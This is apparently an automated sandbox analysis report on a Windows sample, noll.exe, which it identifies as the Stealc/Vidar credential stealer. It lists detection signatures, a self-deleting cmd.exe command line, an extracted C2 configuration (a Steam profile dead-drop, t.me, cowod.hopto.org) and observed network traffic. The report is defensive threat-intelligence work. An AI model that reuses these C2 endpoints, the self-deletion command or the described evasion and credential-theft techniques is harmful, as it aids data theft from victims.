Edit tour

Windows Analysis Report
noll.exe

Overview

General Information

Sample name:	noll.exe
Analysis ID:	1577315
MD5:	d78f753a16d17675fb2af71d58d479b0
SHA1:	71bfc274f7c5788b67f7cfae31be255a63dcf609
SHA256:	ad9c40c2644ff83e0edbc367c6e62be98c9632157433108c03379351fe7aeca5
Tags:	18521511316185215113209bulletproofexeuser-abus3reports
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Machine Learning detection for sample

PE file has a writeable .text section

Searches for specific processes (likely to inject)

Self deletion via cmd or bat file

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Classification

Process Tree

System is w10x64

noll.exe (PID: 3636 cmdline: "C:\Users\user\Desktop\noll.exe" MD5: D78F753A16D17675FB2AF71D58D479B0)

cmd.exe (PID: 1120 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\noll.exe" & rd /s /q "C:\ProgramData\HJDHCFCBGIDG" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 6572 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "2ee1445fc63bc20d0e7966867b13e0e1"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author
noll.exe	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
noll.exe	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
noll.exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: noll.exe PID: 3636	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: noll.exe PID: 3636	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: noll.exe PID: 3636	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: noll.exe PID: 3636	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
0.0.noll.exe.80000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.0.noll.exe.80000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.0.noll.exe.80000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.noll.exe.80000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.noll.exe.80000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.noll.exe.80000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Code function: 0_2_00086963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00086963

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ae5ed HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org

Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cowod.=cloudflare
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cowod.hopto
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cowod.hopto.
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cowod.hopto.ef=
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cowod.hopto.flare
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: noll.exe	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cowod.hopto.orgiv
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cowod.hopto.orglass=
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cowod.hopto.orgre
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cowod.hoptoml
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cowod.hoptoref=
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 76561199780418869[1].htm.0.dr	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/publi
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbS
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&am
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=THDq
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&l=englis
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarog
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&amp
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
Source: 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFm
